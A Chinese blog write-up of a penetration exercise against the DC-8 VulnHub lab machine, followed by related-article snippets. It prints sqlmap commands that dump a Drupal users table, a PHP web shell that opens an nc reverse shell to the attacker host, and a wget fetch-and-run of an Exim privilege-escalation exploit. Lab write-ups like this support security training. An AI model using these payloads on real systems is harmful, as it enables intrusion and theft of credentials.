DC-8靶机练习

最新推荐文章于 2024-09-29 22:30:48 发布
最新推荐文章于 2024-09-29 22:30:48 发布
阅读量209 收藏 4
点赞数 1
分类专栏: 内网安全 文章标签: sql 数据库 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51353029/article/details/120153454
版权
本文详述了一次渗透测试的过程,从扫描存活主机和开放端口,发现Drupal框架的网站,到利用SQL注入漏洞获取数据库信息,通过john解密密码,再到反弹shell并寻找SUID权限的程序,最终成功获取Root权限并找到flag。过程中涉及了nmap、sqlmap、john等工具的使用。
摘要由CSDN通过智能技术生成

KALI:192.168.78.131
靶机:192.168.78.141

查询存活主机,扫面开放端口:

ifconfig
nmap -sP 192.168.78.0/24 
nmap -p 1-65535 -A -sV 192.168.78.140

在这里插入图片描述
访问80端口:

在这里插入图片描述
采用的是Durpal框架,该框架在DC-1系列也出现过。
那这里先扫描一下域名,再看下服务,最后再MSF查询

dirsearch发现一个登录界面

在这里插入图片描述
访问登陆界面:

在这里插入图片描述
考虑到爆破 先查询一下MSF该框架有无漏洞

在这里插入图片描述
都不能使用

再次看看开放的业务,发现sql注入:

在这里插入图片描述
很明显的SQL注入漏洞,直接上sqlmap

sqlmap -u http://192.168.43.18/?nid=0%27 --dbs

在这里插入图片描述
发现数据库 d7db 继续爆表

sqlmap -u "http://192.168.78.141/?nid=2" -D d7db --tables

在这里插入图片描述
找到users ,继续爆字段

sqlmap -u "http://192.168.78.141/?nid=2" -D d7db -T users --columns

在这里插入图片描述
发现 name和pass的字段

sqlmap -u http://192.168.78.141/?nid=2 -D d7db -T users -C name,pass --dump

在这里插入图片描述

很显然需要john解密

在这里插入图片描述
拿到密码 :turtle
去登陆,浏览下业务
在这里插入图片描述
写个shell

<p> this is a test </p>
<?php
system("nc -e /bin/bash 192.168.182.137 2333");
?>

反弹成功

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

查看suid

find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

发现可疑目标

在这里插入图片描述
查询一下本机的版本

exim --version

在这里插入图片描述
查询POC

searchexploit exim 4

在这里插入图片描述
开启FTP,把脚本文件上传到靶机/tmp目录即可

在这里插入图片描述

FTP连接,发现靶机没有开启FTP服务

在这里插入图片描述
那就开启端口,并且把46996.sh放到/tmp目录下


python -m SimpleHTTPServer 8000

wget http://192.168.78.131:8000/46996.sh

再下载之前先对46996.sh进行编辑

: set ff =unix  使windows的代码可以在unix上运行 #除了这种方法的话下面这种可以
dos2unix 46996.sh #将文件转换成unix格式

然后下载执行即可

chmod +x 46996.sh
./46996.sh -m netcat

在这里插入图片描述
拿到Root权限
查找一个flag的位置

find / -name "*lag*" 2> /dev/null

在这里插入图片描述拿到flag

hahahahaha!
关注
专栏目录
DC-4靶机练习
千寻的博客
01-02 3100
DC-4靶机练习 第一步 扫描主机 [nmap -sP 192.168.139.0/24] 第二步 扫描端口 [nmap -A 192.168.139.147 -p 1-65535] 第三步 访问80网页 第四步 尝试使用burp获取账号和密码 Kali的浏览器中安装插件 proxy switch 打开burpon 打开抓包 [cat /usr/share/john/password.l...
DC-1 靶机安装及练习
weixin_45451139的博客
01-24 2077
1. 靶机下载安装 下载地址:DC-1 下好后,进行解压,得到一个 .ova 文件, 注意导入后将虚拟机的网络模式由桥接模式改为NAT模式 安装好后虚拟机界面如图: 2. 进行练习 2.1获取flag1文件 首先打开kali机,因为该靶机和kali在同一网段下,因此现在kali中输入ifconfig 进行查看kali机所在网段 由图可知,该kali机ip为192.168.220.128, 因此所在网段为192.168.220.0 然后,用nmap进行扫描该网段: nmap -sP 192.168.2
Vulnhub靶场-DC-2靶机练习
qq_44877412的博客
01-20 445
Vulnhub-DC-2 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机DC-2 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 一、信息收集 1、主机存活扫描 arp-scan -l 2、端口扫描 nmap -A -p- 192.168.143.135 发现开放的端口以及服务 80 wordpress 7744 ssh 3、脚本扫描 nmap --script
DC-1靶机练习【超详细】
热门推荐
不知名白帽的博客
09-07 1万+
DC-1靶机练习【超详细】
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1777
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC-2靶机详解
苏生要努力
03-03 1411
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
DC-2靶机进行渗透测试
zll___的博客
03-11 826
DC-2靶机进行渗透测试
DC-1靶机渗透笔记
qq_60600840的博客
08-08 240
DC-1靶机、安全、渗透、靶机
靶机练习-DC-4靶机复现
m0_63755076的博客
09-21 1072
hydra -l jim -P /root/桌面/pass ssh://192.168.用的darkweb2017-top10000.txt,爆破出来密码是happy。发现有charles,jim和sam可以登录,查看三个账户的家目录。发现46996.sh脚本可以提权,将其发送到DC-4中。发现开放了22和80端口,访问80端口。2.使用nmap扫描靶机开放的端口(发现有exim4命令,可以提权。执行46996.sh文件。
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Linux云计算 |【第四阶段】NOSQL-DAY2
小安的运维专栏
09-26 1176
Redis集群概述、部署Redis集群(配置manage管理集群主机、创建集群、访问集群、添加节点、移除节点)
实用SQL小总结
UntifA的博客
09-29 1244
SQL记录
PostgreSQL的表碎片
文牧之的博客
09-29 481
表碎片化是指表数据在文件系统中的不连续存储,导致读取和写入操作的效率降低。频繁的插入和删除:导致数据块中出现“空洞”。更新操作:由于 PostgreSQL 的 MVCC(多版本并发控制)机制,更新操作会生成新的行版本,原来的空间会被标记为可重用但是不立即回收。
sql中的regexp与like区别
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
09-26 5268
对于字符串数据的模糊匹配,REGEXP(正则表达式)和LIKE是两个非常有用的操作符。
SQL中基本SELECT语句及常见关键字的使用(内连接,左/右连接)
最新发布
qq_43800449的博客
09-29 835
DDL(Data Definition Languages)语句:数据定义语言,这些语句定义了不同的数据段、数据库、表、列、索引等数据库对象的定义。常用的语句关键字主要包括 create 、 drop 、 alter 、create等。DML(Data Manipulation Language)语句:数据操纵语句,用于添加、删除、更新和查询数据库记录(增删改查),并检查数据完整性,常用的语句关键字主要包括 insert 、 delete 、 update 等。
PostgreSQL 17新特性merge语法增强
zxrhhm的博客
09-27 589
merge语法增强,支持 RETURNING 子句,可以返回新增、更新或者删除的数据行
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
飞奔的屎壳郎
09-27 988
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值